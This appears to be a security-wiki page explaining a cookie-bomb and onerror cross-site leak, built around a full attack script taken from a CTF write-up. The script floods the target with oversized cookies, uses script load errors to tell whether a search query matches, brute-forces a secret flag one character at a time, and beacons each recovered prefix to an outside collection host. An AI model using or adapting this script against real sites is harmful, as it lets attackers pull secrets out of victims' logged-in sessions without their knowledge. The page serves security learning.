# Cookie Bomb + Onerror XS Leak

{{#include ../../banners/hacktricks-training.md}}

The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) is exploiting a functionality that allows the user to **insert any amount of cookies**, and then loading a file as a script knowing that the true response will be larger than the false one and then. If successful, the response is a redirect with a resulting URL longer, **too large to handle by the server so return an error http status code**. If the search fails, nothing will happen because URL is short.

```html
<>'";
<form action="https://sustenance.web.actf.co/s" method="POST">
  <input id="f" /><input name="search" value="a" />
</form>
<script>
  const $ = document.querySelector.bind(document)
  const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
  let i = 0
  const stuff = async (len = 3500) => {
    let name = Math.random()
    $("form").target = name
    let w = window.open("", name)
    $("#f").value = "_".repeat(len)
    $("#f").name = i++
    $("form").submit()
    await sleep(100)
  }
  const isError = async (url) => {
    return new Promise((r) => {
      let script = document.createElement("script")
      script.src = url
      script.onload = () => r(false)
      script.onerror = () => r(true)
      document.head.appendChild(script)
    })
  }
  const search = (query) => {
    return isError(
      "https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query)
    )
  }
  const alphabet =
    "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ"
  const url = "//en4u1nbmyeahu.x.pipedream.net/"
  let known = "actf{"
  window.onload = async () => {
    navigator.sendBeacon(url + "?load")
    await Promise.all([stuff(), stuff(), stuff(), stuff()])
    await stuff(1600)
    navigator.sendBeacon(url + "?go")
    while (true) {
      for (let c of alphabet) {
        let query = known + c
        if (await search(query)) {
          navigator.sendBeacon(url, query)
          known += c
          break
        }
      }
    }
  }
</script>
```

{{#include ../../banners/hacktricks-training.md}}